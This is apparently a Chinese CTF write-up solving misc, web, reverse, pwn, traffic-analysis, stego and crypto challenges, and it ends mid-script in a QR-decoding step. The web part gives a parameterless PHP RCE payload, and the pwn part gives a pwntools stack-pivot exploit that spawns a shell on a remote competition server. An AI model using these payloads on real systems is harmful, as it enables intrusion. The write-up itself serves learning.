其他题目整合到我的CTF仓库中了

其他题目

Misc

八卦迷宫

题目下载

image-20220108202918427

flag为cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

Web

RCE_No_Para

根据题目提示,无参数的RCE,

源码提示括号里不能有参数,且禁止了含dir的相关函数、end等指针的移动和session的使用,但可以利用数组函数将传入的另一个值进行命令执行,编写脚本如下

import requests payload = “readfile(pos(array_reverse(current(get_defined_vars()))))”url = f’http://da077b2f.lxctf.net/?code={payload};&a=flag.php' r = requests.get(url=url)print (r.text)

flag{dd5684123bd91016827ea1aca4890a0c}

逆向

combat_slogan

题目下载

拿到题目后发现是.jar的文件,放入jd-gui逆向出java代码,代码逻辑很简单,就是对输入的字符串进行一个加密,加密函数为ttk,加密之后与字符串Jr_j11y_s1tug_g0_raq_g0_raq_pnml作比较,因此,解题思路就是把ttk函数的算法逆向,从而得出满足条件的用户输入值

image-20220108194953827

解密脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <iostream>
#include <string>

using namespace std;

int main(void) {
    string s = "Jr_j11y_s1tug_g0_raq_g0_raq_pnml";
    int len = s.size();
    for (int i = 0; i < len; i++) {
        if (s[i] - 13 >= 'a' && s[i] - 13 <= 'm') {
            s[i] -= 13;
        }
        else if (s[i] - 13 >= 'A' && s[i] - 13 <= 'M') {
            s[i] -= 13;
        }
        else if (s[i] + 13 >= 'n' && s[i] + 13 <= 'z') {
            s[i] += 13;
        }
        else if (s[i] + 13 >= 'N' && s[i] + 13 <= 'Z') {
            s[i] += 13;
        }
    }
    cout << s << endl;
    return 0;
}

解出来是We_w11l_f1ght_t0_end_t0_end_cazy

image-20220108195236862

cute_doge

题目下载

拿到题目是一个exe加了很多动态链接文件的东西,打开后怎么点也没法点出flag,用x64dbg调试也不太好去找弹出flag的窗口

image-20220108195440376

不过在ida中去搜字符串,发现有可疑的字符串

image-20220108195614379

对字符串”ZmxhZ3tDaDFuYV95eWRzX2Nhenl9”进行base64解密即可,得到flag{Ch1na_yyds_cazy}

image-20220108195723146

hello_py

题目下载

题目是一个pyc的文件,通过uncompyle6 -o . .\easy_py.cpython-38.pyc命令可以逆向得到py代码,解密的关键很直接,只需要输入的值经过encode_1和encode_2转化后为44, 100, 3, 50, 106, 90, 5, 102, 10, 112(即跟happy的值一样)就成功了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.8.3 (tags/v3.8.3:6f8c832, May 13 2020, 22:20:19) [MSC v.1925 32 bit (Intel)]
# Embedded file name: C:\Users\Administrator\Desktop\easy_py.py
# Compiled at: 2021-12-28 15:45:17
# Size of source mod 2**32: 1099 bytes
import threading, time

def encode_1(n):
    global num
    while True:
        if num >= 0:
            flag[num] = flag[num] ^ num
            num -= 1
            time.sleep(1)
        if num <= 0:
            break


def encode_2(n):
    global num
    while True:
        if num >= 0:
            flag[num] = flag[num] ^ flag[(num + 1)]
            num -= 1
            time.sleep(1)
        if num < 0:
            break


while True:
    Happy = [
     44, 100, 3, 50, 106, 90, 5, 102, 10, 112]
    num = 9
    f = input('Please input your flag:')
    if len(f) != 10:
        print('Your input is illegal')
    else:
        flag = list(f)
        j = 0
        for i in flag:
            flag[j] = ord(i)
            j += 1
        else:
            print("flag to 'ord':", flag)
            t1 = threading.Thread(target=encode_1, args=(1, ))
            t2 = threading.Thread(target=encode_2, args=(2, ))
            t1.start()
            time.sleep(0.5)
            t2.start()
            t1.join()
            t2.join()

        if flag == Happy:
            print('Good job!')
        else:
            print('No no no!')

因为题目是多线程,为了方便观察,我对encode_1和encode_2内部的以下几个地方增加了输出,打印当前的num值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def encode_1(n):
    global num
    while True:
        if num >= 0:
            print("aaa" + str(num))
            flag[num] = flag[num] ^ num
            num -= 1
            time.sleep(1)
            print("haha" + str(num))
        if num <= 0:
            break


def encode_2(n):
    global num
    while True:
        if num >= 0:
            print("bbb" + str(num))
            flag[num] = flag[num] ^ flag[(num + 1)]
            num -= 1
            time.sleep(1)
            print("xixi" + str(num))
        if num < 0:
            break

结果如下:

image-20220108200956558

说明执行流程是这样的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
flag[9] = flag[9] ^ 9

flag[8] = flag[8] ^ flag[9]

flag[7] = flag[7] ^ 7

flag[6] = flag[6] ^ flag[7]

flag[5] = flag[5] ^ 5

flag[4] = flag[4] ^ flag[5]

flag[3] = flag[3] ^ 3

flag[2] = flag[2] ^ flag[3]

flag[1] = flag[1] ^ 1

flag[0] = flag[0] ^ flag[1]

要解密出来只需要逆过来算一遍flag即可

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
Happy = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]
flag = []
for i in range(0, len(Happy)):
    if i % 2 == 0:
        t = Happy[i] ^ Happy[i+1]
        flag.append(t)
    else:
        t = Happy[i] ^ i
        flag.append(t)
flag_str = ""
for i in flag:
    flag_str += chr(i)
print(flag_str)

最后解出来是He110_cazy

image-20220108201556011

PWN

pwn1

题目下载

题目开启了Full RELRO和NX保护

image-20220108201751138

反汇编后,明显看到read时让buf溢出了,可以覆盖掉函数调用前栈中rbp、rsp的值(但不是直接控制),而且还有buf(栈顶的实际地址泄露)

1
2
3
4
5
6
7
8
9
int __cdecl main()
{
  char buf[52]; // [esp+0h] [ebp-38h] BYREF

  sub_80484FB();
  printf("Gift:%p\n", buf);
  read(0, buf, 256u);
  return 0;
}

0x8048540是get_shell的地址,里面直接有bin_sh和system,因此不用考虑ret2libc,此题关键在于弄清楚ecx干扰函数返回时的栈空间状态还原,与常规的不同,哪怕用了leave,最后还是取决于ecx,所以需要关注ecx的变化以及来源

image-20220108201918273

弄清楚这个点后,其实题目就是一个stack_pivot的问题,只需要根据结构构造出ebp、esp的值,如何构造?利用泄露的buf,根据ecx的来源ebp+var_4和去向ecx-4,把buf的首地址赋值为get_shell的地址,最后retn的时候就可以执行get_shell了

image-20220108202550935

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# encoding: utf-8
from pwn import *
context(os='linux', arch='i386', log_level='debug')

r = remote("113.201.14.253", 16088)
#r = process("./pwn1")
buf_addr = r.recvuntil("\n")
buf_addr = buf_addr.replace("\n", "")
buf_addr = buf_addr.replace("Gift:", "")
buf_addr = int(buf_addr, 16)
print(hex(buf_addr))
shell_addr = 0x8048540

payload = p32(shell_addr) + (52-8)*'A' + p32(buf_addr+4) + p32(buf_addr+4) + p32(buf_addr+4) + p32(buf_addr+4)
r.send(payload)
r.interactive()

flag{474b7f9219effe69530da4ad63c1752a}

image-20220108202803452

补题(持续更新)

西安加油(初见流量题)

题目下载

拿到题目是一道流量分析的文件,需要放到wireshark中分析

image-20220114113358034

对流量包导出HTTP对象,发现只有hint.txt和secret.txt中有可以分析的内容

image-20220114113503035

导出来hint.txt

1
HE2DAMZOOBXGOIDJOMQDACRYGA4DMLTQNZTSA2LTEAYQUNZTGAYS44DOM4QGS4ZAGIFDONBSGIXHA3THEBUXGIBTBIZTSNZYFZYG4ZZANFZSANAKHAZDMNROOBXGOIDJOMQDKCRXGY4DGLTQNZTSA2LTEA3AUNJUGEYC44DOM4QGS4ZAG4FDIMZWGUXHA3THEBUXGIBYBIZDIMRWFZYG4ZZANFZSAOIKHEYDKNROOBXGOIDJOMQDCMAKGMZDANJOOBXGOIDJOMQDCMIKGYZTMMJOOBXGOIDJOMQDCMQKHEYTMNZOOBXGOIDJOMQDCMYKGMYTSNJOOBXGOIDJOMQDCNAKGU4DKMROOBXGOIDJOMQDCNIKHEZDQMBOOBXGOIDJOMQDCNQKHE3TAMROOBXGOIDJOMQDCNYKHA2DENBOOBXGOIDJOMQDCOAKGE3DONJOOBXGOIDJOMQDCOIKGMYDCNBOOBXGOIDJOMQDEMAKG44TQNROOBXGOIDJOMQDEMIKHA2DGMROOBXGOIDJOMQDEMQKG4YTGOJOOBXGOIDJOMQDEMYKGQ3DKNJOOBXGOIDJOMQDENAKG4ZDKOBOOBXGOIDJOMQDENIKGM2TMNJOOBXGOIDJOMQDENQKGU2DINBOOBXGOIDJOMQDENYKG4ZTQNBOOBXGOIDJOMQDEOAKGIYDAMZOOBXGOIDJOMQDEOIKHA3DQOBOOBXGOIDJOMQDGMAKGU4TKNROOBXGOIDJOMQDGMIKGM2TAOJOOBXGOIDJOMQDGMQKHEYDENZOOBXGOIDJOMQDGMYKGE4TANJOOBXGOIDJOMQDGNAKGYYDQNJOOBXGOIDJOMQDGNIKG42DANROOBXGOIDJOMQDGNQKGE3DKMBOOBXGOIDJOMQDGNYKHA3DAMROOBXGOIDJOMQDGOAKHEZTONZOOBXGOIDJOMQDGOIKGEZTEMZOOBXGOIDJOMQDIMAKG4ZTEMJOOBXGOIDJOMQDIMIKGI3TINZOOBXGOIDJOMQDIMQKG4YTENJOOBXGOIDJOMQDIMYKGEZDEMBOOBXGOIDJOMQDINAKG4YDOOJOOBXGOIDJOMQDINIKGUYTOMROOBXGOIDJOMQDINQKGUYDOMBOOBXGOIDJOMQDINY=

是一个base32加密的字符串,解出来是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
9403.png is 0
8086.png is 1
7301.png is 2
7422.png is 3
3978.png is 4
8266.png is 5
7683.png is 6
5410.png is 7
4365.png is 8
2426.png is 9
9056.png is 10
3205.png is 11
6361.png is 12
9167.png is 13
3195.png is 14
5852.png is 15
9280.png is 16
9702.png is 17
8424.png is 18
1675.png is 19
3014.png is 20
7986.png is 21
8432.png is 22
7139.png is 23
4655.png is 24
7258.png is 25
3565.png is 26
5444.png is 27
7384.png is 28
2003.png is 29
8688.png is 30
5956.png is 31
3509.png is 32
9027.png is 33
1905.png is 34
6085.png is 35
7406.png is 36
1650.png is 37
8602.png is 38
9377.png is 39
1323.png is 40
7321.png is 41
2747.png is 42
7125.png is 43
1220.png is 44
7079.png is 45
5172.png is 46
5070.png is 47

base64解密secret.txt,看到开头的魔数,PK就是zip压缩包的头,然后在cyberchef中save output file

image-20220114125604965

把cyberchef的内容复制到010中保存或者改下后缀名为zip,就能解压出很多图片了

image-20220114125929841

按照hint的png提示顺序,拼出来的图片就是flag了,cazy{make_xiAN_great_Again}

Ez_Steg

题目下载

爆破六位得到密码为220101,解压出来有两个文件,emojio.txt里面全是表情

image-20220113094357257

pyc隐写,在kali中执行命令./stegosaurus -x ../steg.pyc执行之后,得到TheKey:St3g1sV3ryFuNny

1
2
3
┌──(root💀kali)-[/home/re1own/Desktop/misc/stegosaurus]
└─# ./stegosaurus -x ../steg.pyc                                                                                                                                                                                         1 ⨯
Extracted payload: TheKey:St3g1sV3ryFuNny

emoji解密网站:https://emoji-aes.miaotony.xyz/

得到cazy{Em0j1s_AES_4nd_PyC_St3g_D0_yoU_l1ke}

image-20220113094456766

no_cry_no_can

题目下载

题目给了一个py代码,看懂代码后,下面的代码最后输出的c其实是flag ^ key的值,所以要求原来的flag其实就是再和key进行一次异或操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Util.number import*
from secret import flag,key

assert len(key) <= 5
assert flag[:5] == b'cazy{'
def can_encrypt(flag,key):
    block_len = len(flag) // len(key) + 1
    new_key = key * block_len
    return bytes([i^j for i,j in zip(flag,new_key)])

c = can_encrypt(flag,key)
print(c)

# b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'

解密脚本

1
2
3
4
5
6
7
8
9
10
flag = b'cazy{'
c = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'

def can_encrypt(flag, key):
    block_len = len(flag) // len(key) + 1
    new_key = key * block_len
    return bytes([i ^ j for i, j in zip(flag, new_key)])

flag = can_encrypt(c, can_encrypt(flag, c))
print(flag)

解出来cazy{y3_1s_a_h4nds0me_b0y!}

1
2
🍎 ~/nop/ python3 test.py
b'cazy{y3_1s_a_h4nds0me_b0y!}'

Binary_misc

题目下载

题目下载下来,linux中file查看文件信息,发现是一个class数据文件

1
2
3
┌──(root💀06aa46c0844f)-[/home]
└─# file 234
234: compiled Java class data, version 52.0 (Java 1.8)

把文件后缀改为class,用idea打开如下

1
2
3
4
5
6
7
8
9
10
11
12
13
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

public class Main {
    public Main() {
    }

    public static void main(String[] var0) {
        byte[] var10000 = new byte[]{77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 70, 120, 117, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 70, 120, 117, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 86, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 65, 61, 61};
    }
}

把var10000数组中的数据提取出来,16进制转ascii码

1
MDAwMDAwMDEwMTExMDAwMDAwMDAxMTExMTEwMTExMDAwMDAwMFxuMDExMTExMDEwMTEwMTAxMDExMTExMDAwMTExMDExMDExMTExMFxuMDEwMDAxMDEwMDAwMTExMTAwMDExMTAxMDExMDExMDEwMDAxMFxuMDEwMDAxMDExMDAwMDAxMTAwMDExMTAwMDAwMTAxMDEwMDAxMFxuMDEwMDAxMDExMTAxMTAxMTAwMTEwMTEwMTAxMTExMDEwMDAxMFxuMDExMTExMDEwMTExMDEwMDAwMDAwMTAwMTAwMDAxMDExMTExMFxuMDAwMDAwMDEwMTAxMDEwMTAxMDEwMTAxMDEwMTAxMDAwMDAwMFxuMTExMTExMTEwMDEwMDAwMDAwMDEwMDExMDAxMTExMTExMTExMVxuMTEwMDAxMDEwMTAxMDAwMDEwMTExMTExMDEwMDAwMDAxMTAwMFxuMDEwMTEwMTAwMDExMDAxMDAxMDAwMDEwMDExMDEwMTAxMTEwMVxuMTAxMTAwMDAwMTAwMTExMTAwMTEwMDAxMTAxMDAwMDAxMDAxMFxuMTExMDExMTExMTExMDAxMDEwMTEwMTAwMDExMDEwMTAxMTEwMFxuMTAxMDExMDAwMTExMDAwMDAwMDExMDEwMDAwMDAwMDAwMDAxMFxuMDExMDEwMTAwMTAwMDEwMDAxMTAxMTEwMTAxMTEwMTExMTEwMVxuMDAxMDEwMDEwMDExMTExMTEwMTExMDAwMDExMDAxMDEwMDAxMFxuMDAxMDAwMTEwMTExMDExMDExMDAxMTAwMTEwMDExMDAxMTEwMVxuMTExMDEwMDExMDAwMTExMTExMTAxMTAxMDAxMTAwMDAwMDAxMFxuMDAwMDExMTAxMDEwMDAxMTEwMDAwMDEwMTEwMTExMTExMDExMVxuMTEwMTEwMDExMDEwMTEwMTAwMTEwMDAxMDEwMDExMDAwMDEwMFxuMDEwMTAwMTAwMTExMTAwMTAwMDAwMTAwMTExMDAxMDAxMDExMVxuMDEwMTAxMDAxMTAwMDExMTAwMDExMDAxMDAwMDAxMDEwMTAwMFxuMTAwMTEwMTExMTEwMTExMDExMDAxMDAxMTExMTEwMTAxMTEwMVxuMTEwMTEwMDAxMDExMTAwMDAwMDEwMTExMDExMDAwMTAxMTAxMFxuMDAxMTAwMTAwMDExMTEwMTEwMDAxMTExMDEwMDEwMDExMTEwMVxuMDEwMTAwMDAwMTExMDEwMTExMDExMDEwMTExMTExMDEwMDAxMFxuMDEwMTAxMTAxMTAwMTAwMTAwMDAwMDExMDEwMDAxMDAxMTExMVxuMDExMDEwMDAxMDAwMTExMDAxMDExMDAxMTAxMTExMTAwMTEwMFxuMDExMTAwMTExMTEwMDAwMDAxMDExMDExMDExMTAwMTExMTEwMFxuMDEwMDExMDAxMDExMDAxMDEwMDAxMDExMTAxMTAwMDAwMDAwMFxuMTExMTExMTEwMTAxMTAwMTExMDAxMTEwMDEwMTAxMTEwMTAxMVxuMDAwMDAwMDExMTAwMDExMTAxMTAxMDExMDAwMTAxMDEwMDEwMFxuMDExMTExMDExMTAwMTEwMTAxMDExMDEwMTEwMDAxMTEwMTExMVxuMDEwMDAxMDEwMDExMDAwMDExMDAxMTAxMDAwMDAwMDAwMDAxMFxuMDEwMDAxMDEwMTExMTEwMTEwMDAxMTExMTExMTExMDEwMDExMVxuMDEwMDAxMDEwMTEwMTExMTExMTEwMDAwMDAxMDEwMTAxMDExMFxuMDExMTExMDExMTExMTAwMDEwMTEwMTAwMTExMTAwMDExMDExMFxuMDAwMDAwMDExMTExMTAxMTExMDExMDAwMDAwMDEwMDAxMTAwMA

base64解码

1
0000000101110000000011111101110000000\n0111110101101010111110001110110111110\n0100010100001111000111010110110100010\n0100010110000011000111000001010100010\n0100010111011011001101101011110100010\n0111110101110100000001001000010111110\n0000000101010101010101010101010000000\n1111111100100000000100110011111111111\n1100010101010000101111110100000011000\n0101101000110010010000100110101011101\n1011000001001111001100011010000010010\n1110111111110010101101000110101011100\n1010110001110000000110100000000000010\n0110101001000100011011101011101111101\n0010100100111111101110000110010100010\n0010001101110110110011001100110011101\n1110100110001111111011010011000000010\n0000111010100011100000101101111110111\n1101100110101101001100010100110000100\n0101001001111001000001001110010010111\n0101010011000111000110010000010101000\n1001101111101110110010011111101011101\n1101100010111000000101110110001011010\n0011001000111101100011110100100111101\n0101000001110101110110101111110100010\n0101011011001001000000110100010011111\n0110100010001110010110011011111001100\n0111001111100000010110110111001111100\n0100110010110010100010111011000000000\n1111111101011001110011100101011101011\n0000000111000111011010110001010100100\n0111110111001101010110101100011101111\n0100010100110000110011010000000000010\n0100010101111101100011111111110100111\n0100010101101111111100000010101010110\n0111110111111000101101001111000110110\n0000000111111011110110000000100011000

0101转二维码

1
2
3
4
5
6
7
8
9
10
11
s = '0000000101110000000011111101110000000\n0111110101101010111110001110110111110\n0100010100001111000111010110110100010\n0100010110000011000111000001010100010\n0100010111011011001101101011110100010\n0111110101110100000001001000010111110\n0000000101010101010101010101010000000\n1111111100100000000100110011111111111\n1100010101010000101111110100000011000\n0101101000110010010000100110101011101\n1011000001001111001100011010000010010\n1110111111110010101101000110101011100\n1010110001110000000110100000000000010\n0110101001000100011011101011101111101\n0010100100111111101110000110010100010\n0010001101110110110011001100110011101\n1110100110001111111011010011000000010\n0000111010100011100000101101111110111\n1101100110101101001100010100110000100\n0101001001111001000001001110010010111\n0101010011000111000110010000010101000